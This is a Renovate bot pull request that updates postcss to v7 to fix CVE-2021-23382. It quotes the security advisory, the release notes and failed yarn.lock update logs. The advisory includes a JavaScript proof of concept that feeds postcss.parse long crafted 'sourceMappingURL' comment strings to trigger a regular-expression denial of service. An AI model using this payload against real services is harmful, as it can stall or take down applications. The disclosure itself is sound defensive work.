Update dependency postcss to v7 [SECURITY] #42

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Open

renovate wants to merge 1 commit into master from renovate/npm-postcss-vulnerability

renovate bot commented Oct 3, 2023 •

edited

Loading

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
postcss (source)	`^6.0.11` -> `^7.0.0`

GitHub Vulnerability Alerts

CVE-2021-23382

The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern

\/\*\s* sourceMappingURL=(.*)

PoC

var postcss = require("postcss")
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}

postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i) try {
            postcss.parse(attack_str) var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}

Release Notes

postcss/postcss (postcss)

`v7.0.36`

Backport ReDoS vulnerabilities from PostCSS 8.

`v7.0.35`

Add migration guide link to PostCSS 8 error text.

`v7.0.34`

Fix compatibility with postcss-scss 2.

`v7.0.33`

Add error message for PostCSS 8 plugins.

`v7.0.32`

Fix error message (by @admosity).

`v7.0.31`

Use only the latest source map annotation (by Emmanouil Zoumpoulakis).

`v7.0.30`

Fix TypeScript definition (by Natalie Weizenbaum).

`v7.0.29`

Update Processor#version.

`v7.0.28`

Fix TypeScript definition (by Natalie Weizenbaum).

`v7.0.27`

Fix TypeScript definition (by Natalie Weizenbaum).

`v7.0.26`

Fix TypeScript definition (by Natalie Weizenbaum).

`v7.0.25`

Fix absolute path support for Windows (by Tom Raviv).

`v7.0.24`

Fix TypeScript definition (by Keith Cirkel).

`v7.0.23`

Update Processor#version.

`v7.0.22`

Add funding link for npm fund.

`v7.0.21`

Revert passing nodes property to node constructor.

`v7.0.20`

Allow to pass PostCSS’s nodes in nodes property to node constructor.

`v7.0.19`

Fix passing nodes property to node constructor.

`v7.0.18`

Fix TypeScript type definitions (by Jan Buschtöns).

`v7.0.17`

Fix TypeScript type definitions (by Bob Matcuk and Jan Buschtöns).

`v7.0.16`

Revert Custom Properties fix until PostCSS 8.0.

`v7.0.15`

Fix Custom Properties support (by Ivan Solovev).

`v7.0.14`

Fix tokenizer for postcss-less (by Matt Lyons).

`v7.0.13`

Fix parsing regression in 7.0.12 for comments between property and value.

`v7.0.12`

Fix parsing broken CSS with two words in declaration property.

`v7.0.11`

Fix source maps on declaration semicolon (by Niklas Mischkulnig).

`v7.0.10`

Fix source maps (by Niklas Mischkulnig).

`v7.0.9`

Increase stringifing performance for non-raws AST.

`v7.0.8`

Fix TypeScript definitions (by Ankur Oberoi).
Use support-colors 6.0.

`v7.0.7`

Extend Error in CssSyntaxError.

`v7.0.6`

Fix parsing files with BOM (by Veniamin Krol).

`v7.0.5`

Reduce npm package size (by Gilad Peleg).

`v7.0.4`

Fix safe parser regression.

`v7.0.3`

Update Processor#version.

`v7.0.2`

Update Processor#version.

`v7.0.1`

Fix passing nodes property to node constructor.

`v7.0.0`: 7.0 “President Amy”

President Amy seal

PostCSS 7.0 dropped Node.js 4 support and brought small features.

Breaking Changes

We removed Node.js 4 and Node.js 9 support since it doesn’t have security updates anymore.

We removed IE and “dead” browsers (without security updates) from Babel’s Browserslist. Don't worry, PostCSS still generate IE-compatible code. These changes affect websites which run PostCSS on client-side like CodePen.

last 2 version
not dead
not Explorer 11
not ExplorerMobile 11
node 10
node 8
node 6

New Features

@nikhilgaba added cute thing for plugin developers. If an error was happened in Container#walk() circle, PostCSS will show in stack trace CSS node, which causes this error:

TypeError: Cannot read property '0' of undefined
    at /home/ai/Dev/test/app.css:10:4
    at plugin (plugin.js:2:4)
    at runPostCSS (runner.js:2:1)

@igorkamyshev added finally method to LazyResult to make it compatible with the latest Promise API.

Other Changes

Client-side size was reduced by Size Limit feedback.
Add warning on calling PostCSS without plugins and syntax options.

`v6.0.23`

Fix parsing nested at-rules without semicolon, params, and spaces.
Fix docs (by Kevin Schiffer and Pat Cavit).

`v6.0.22`

Fix Node#prev and Node#next on missed parent.

`v6.0.21`

Rename Chinese docs to fix yarnpkg.com issue.

`v6.0.20`

Better error message on null as input CSS.

`v6.0.19`

Fix TypeScript definitions for source maps (by Oleh Kuchuk).
Fix source field in TypeScript definitions (by Sylvain Pollet-Villard).

`v6.0.18`

Use primitive object in TypeScript definitions (by Sylvain Pollet-Villard).

`v6.0.17`

Fix parsing comment in selector between word tokens (by Oleh Kuchuk).

`v6.0.16`

Fix warning text (by Michael Keller).

`v6.0.15`

Add warning about missed from option on process().then() call.
Add IE 10 support.

`v6.0.14`

Fix TypeScript definitions (by Jed Mao).

`v6.0.13`

Fix TypeScript definitions for case of multiple PostCSS versions
in node_modules (by Chris Eppstein).
Use source-map 0.6.

`v6.0.12`

Don’t copy * hack to declaration indent.

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

Author

renovate bot commented Oct 3, 2023

⚠ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

any of the package files in this branch needs updating, or
the branch becomes conflicted, or
you click the rebase/retry checkbox if found above, or
you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: yarn.lock

[22:29:58.580] INFO (9): Installing tool node v10.9.0...
npm ERR! weird error 1
[22:30:02.716] FATAL (9): Command failed with exit code 1: /opt/containerbase/tools/node/10.9.0/bin/npm explore npm -g --prefix /opt/containerbase/tools/node/10.9.0 -- npm install node-gyp@latest --no-audit --cache /tmp/containerbase-npm-8HEZVT --silent
    err: {
      "type": "Error",
      "message": "Command failed with exit code 1: /opt/containerbase/tools/node/10.9.0/bin/npm explore npm -g --prefix /opt/containerbase/tools/node/10.9.0 -- npm install node-gyp@latest --no-audit --cache /tmp/containerbase-npm-8HEZVT --silent",
      "stack":
          Error: Command failed with exit code 1: /opt/containerbase/tools/node/10.9.0/bin/npm explore npm -g --prefix /opt/containerbase/tools/node/10.9.0 -- npm install node-gyp@latest --no-audit --cache /tmp/containerbase-npm-8HEZVT --silent
              at makeError (/snapshot/dist/containerbase-cli.js:42922:13)
              at handlePromise (/snapshot/dist/containerbase-cli.js:43378:29)
              at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
              at async InstallNodeService.updateNodeGyp (/snapshot/dist/containerbase-cli.js:45381:5)
              at async InstallNodeService.install (/snapshot/dist/containerbase-cli.js:45522:7)
              at async InstallToolService.execute (/snapshot/dist/containerbase-cli.js:45972:11)
              at async InstallToolShortCommand.execute (/snapshot/dist/containerbase-cli.js:46296:14)
              at async InstallToolShortCommand.validateAndExecute (/snapshot/dist/containerbase-cli.js:1344:26)
              at async _Cli.run (/snapshot/dist/containerbase-cli.js:2457:22)
              at async _Cli.runExit (/snapshot/dist/containerbase-cli.js:2465:28)
      "shortMessage": "Command failed with exit code 1: /opt/containerbase/tools/node/10.9.0/bin/npm explore npm -g --prefix /opt/containerbase/tools/node/10.9.0 -- npm install node-gyp@latest --no-audit --cache /tmp/containerbase-npm-8HEZVT --silent",
      "command": "/opt/containerbase/tools/node/10.9.0/bin/npm explore npm -g --prefix /opt/containerbase/tools/node/10.9.0 -- npm install node-gyp@latest --no-audit --cache /tmp/containerbase-npm-8HEZVT --silent",
      "escapedCommand": "\"/opt/containerbase/tools/node/10.9.0/bin/npm\" explore npm -g --prefix \"/opt/containerbase/tools/node/10.9.0\" -- npm install \"node-gyp@latest\" --no-audit --cache \"/tmp/containerbase-npm-8HEZVT\" --silent",
      "exitCode": 1,
      "cwd": "/opt/containerbase",
      "failed": true,
      "timedOut": false,
      "isCanceled": false,
      "killed": false
    }
[22:30:03.666] INFO (9): Installed tool node with errors in 5s.


          Update dependency postcss to v7 [SECURITY]

7863dd7

renovate bot force-pushed the renovate/npm-postcss-vulnerability branch from 3496eef to 7863dd7 Compare

August 6, 2024 07:41

Author

renovate bot commented Aug 6, 2024

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

any of the package files in this branch needs updating, or
the branch becomes conflicted, or
you click the rebase/retry checkbox if found above, or
you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: yarn.lock

[07:41:48.669] INFO (136): Installing tool [email protected]...
[07:41:53.932] WARN (136): Npm error:
npm ERR! weird error 1
[07:41:54.348] ERROR (136): node-gyp update command failed
[07:41:54.349] FATAL (136): Install tool node failed in 5.6s.

renovate bot changed the title ~~Update dependency postcss to v8 [SECURITY]~~ Update dependency postcss to v7 [SECURITY]

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet